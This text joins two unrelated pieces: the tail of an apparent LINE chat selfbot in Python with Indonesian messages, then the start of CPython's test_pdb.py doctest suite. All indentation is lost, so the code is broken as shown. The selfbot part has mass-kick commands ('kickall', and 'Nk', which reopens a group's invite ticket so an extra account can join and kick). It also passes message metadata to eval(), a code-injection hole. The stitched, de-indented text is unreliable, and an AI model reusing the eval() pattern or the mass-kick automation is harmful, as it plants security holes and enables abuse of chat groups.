wait["Addaudio"]["status"] = True
wait["Addaudio"]["name"] = str(name.lower())
audios[str(name.lower())] = ""
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim mp3 nya...")
else:
cl.sendText(msg.to, "Mp3 itu sudah dalam list")
elif cmd.startswith("dellmp3 "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in audios:
cl.deleteFile(audios[str(name.lower())])
del audios[str(name.lower())]
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus mp3 {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Mp3 itu tidak ada dalam list")
elif text.lower() == "listmp3":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Lagu 」\n\n"
for audio in audios:
no += 1
ret_ += str(no) + ". " + audio.title() + "\n"
ret_ += "\nTotal「{}」Lagu".format(str(len(audios)))
cl.sendText(to, ret_)
sendMention(msg.to, msg._from,"","\nJika ingin play mp3 nya,\nSilahkan ketik nama - judul\nBisa juga ketik namanya saja")
#=========== [ Add Sticker ] ============#
elif cmd.startswith("addsticker "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in stickers:
wait["Addsticker"]["status"] = True
wait["Addsticker"]["name"] = str(name.lower())
stickers[str(name.lower())] = ""
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim stickernya...")
else:
cl.sendText(msg.to, "Sticker itu sudah dalam list")
elif cmd.startswith("dellsticker "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in stickers:
del stickers[str(name.lower())]
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus sticker {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Sticker itu tidak ada dalam list")
elif text.lower() == "liststicker":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Sticker 」\n\n"
for sticker in stickers:
no += 1
ret_ += str(no) + ". " + sticker.title() + "\n"
ret_ += "\nTotal「{}」Stickers".format(str(len(stickers)))
cl.sendText(to, ret_)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Welcome 」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Welcome 」\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Url 」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Url 」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect kick 」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect kick 」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Join 」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Join 」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Cancel 」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Cancel 」\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Invite 」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Invite 」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "Diaktifkan\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "Dinonaktifkan\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "Diaktifkan\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "Dinonaktifkan\n" + msgs)
elif 'Allprotect ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allprotect ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectantijs:
msgs = ""
else:
protectantijs.append(msg.to)
if msg.to in ghost:
msgs = ""
else:
ghost.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua sudah diaktifkan"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection diaktifkan"
cl.sendMessage(msg.to, "「 Status Protection 」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectantijs:
protectantijs.remove(msg.to)
else:
msgs = ""
if msg.to in ghost:
ghost.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
else:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
cl.sendMessage(msg.to, "「 Status Protection 」\n" + msgs)
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
elif cmd == "kickall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
if wait["Kickallmember"]:
_name = msg.text.replace("Kickall","")
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendMessage(msg.to,"Target Not found.")
else:
for target in targets:
if target not in Bots and target not in Saints:
try:
klist=[cl,ki,kk,kc,km,kb]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
except Exception as error:
cl.sendMessage(msg.to, str(error))
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus staff")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus bot")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "admin:expell" or text.lower() == 'admin:expell':
if msg._from in admin:
wait["delladmin"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "staff:expell" or text.lower() == 'staff:expell':
if msg._from in admin:
wait["dellstaff"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "bot:expell" or text.lower() == 'bot:expell':
if msg._from in admin:
wait["dellbots"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
sendMention(msg.to, sender, "User ", " \nSelfbot direfresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "unsend on" or text.lower() == 'unsend on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["unsend"] = True
sendMention(msg.to, sender, "「 Status Unsend 」\nUser ", "\nSilahkan unsend pesannya,\nKetik unsend off jika sudah slesai")
elif cmd == "unsend off" or text.lower() == 'unsend off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["unsend"] = False
sendMention(msg.to, sender, "「 Status Unsend 」\nUser ", " \nDeteksi unsend dinonaktifkan")
elif cmd == "timeline on" or text.lower() == 'timeline on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Timeline"] = True
sendMention(msg.to, sender, "「 Status Timeline 」\nUser ", "\nSilahkan kirim postingannya,\nKetik timeline off jika sudah slesai")
elif cmd == "timeline off" or text.lower() == 'timeline off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Timeline"] = False
sendMention(msg.to, sender, "「 Status Timeline 」\nUser ", " \nDeteksi timeline dinonaktifkan")
elif cmd == "invite on" or text.lower() == 'invite on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["invite"] = True
sendMention(msg.to, sender, "「 Status Invite 」\nUser ", "\nSilahkan kirim kontaknya,\nKetik invite off jika sudah slesai")
elif cmd == "invite off" or text.lower() == 'invite off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["invite"] = False
sendMention(msg.to, sender, "「 Status Invite 」\nUser ", " \nInvite via contact dinonaktifkan")
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["mentionKick"] = True
cl.sendText(msg.to,"「 Status Notag 」\nNotag telah diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["mentionKick"] = False
cl.sendText(msg.to,"「 Status Notag 」\nNotag telah dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
sendMention(msg.to, sender, "「 Status Contact 」\nUser ", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik contact off")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"「 Status Contact 」\nDeteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"「 Status Respon 」\nAuto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"「 Status Respon 」\nAuto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"「 Status Autojoin 」\nAutojoin telah diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"「 Status Autojoin 」\nAutojoin telah dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah dinonaktifkan")
elif cmd == "autoblock on" or text.lower() == 'autoblock on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = True
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah diaktifkan")
elif cmd == "autoblock off" or text.lower() == 'autoblock off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = False
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"「 Status Autoadd 」\nAutoadd telah diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"「 Status Autoadd 」\nAutoadd telah dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["stickerOn"] = True
sendMention(msg.to, sender, "「 Status Sticker Check 」\n", " [ ON ]\nSilahkan kirim stickernya,\nJika sudah selesai, ketik sticker off")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["stickerOn"] = False
cl.sendText(msg.to,"「 Status Sticker Check 」\nSticker check dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = True
sendMention(msg.to, sender, "「 Status Jointicket 」\nUser ", "\nSilahkan kirim link grupnya,\nJika sudah selesai, ketik jointicket off")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = False
cl.sendText(msg.to,"「 Status Jointicket 」\nJointicket telah dinonaktifkan")
elif cmd == "kick on":
if wait["selfbot"] == True:
if msg._from in admin:
wait["Kickallmember"] = True
cl.sendMessage(msg.to,"Status:\nDiaktifkan")
elif cmd == "kick off":
if wait["selfbot"] == True:
if msg._from in admin:
wait["Kickallmember"] = False
cl.sendMessage(msg.to,"Status:\nDinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan talkban")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus talkban")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"「 Huray not blacklist 」")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Blacklist 」\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Talkban 」\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
cl.sendMessage(msg.to,"Succes clear Blacklist is nothing...")
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nPesan Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nWelcome Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set leave: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set leave: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Leave Msg")
else:
wait["leave"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nLeave Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nRespon Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["message1"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nSpam Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nSider Msg diganti jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Message 」\nPesan Msg mu :\n\n" + str(wait["message"]))
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Welcome 」\nWelcome Msg mu :\n\n" + str(wait["welcome"]))
elif text.lower() == "cek leave":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Leave 」\nLeave Msg mu :\n\n" + str(wait["leave"]))
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Respon 」\nRespon Msg mu :\n\n" + str(wait["Respontag"]))
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Spam 」\nSpam Msg mu :\n\n" + str(Setmain["message1"]))
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Sider 」\nSider Msg mu :\n\n" + str(wait["mention"]))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
# bot(op)
# Don't remove this line, if you wan't get error soon!
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
#thread1.daemon = True
thread1.start()
thread1.join()
except Exception as e:
pass
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
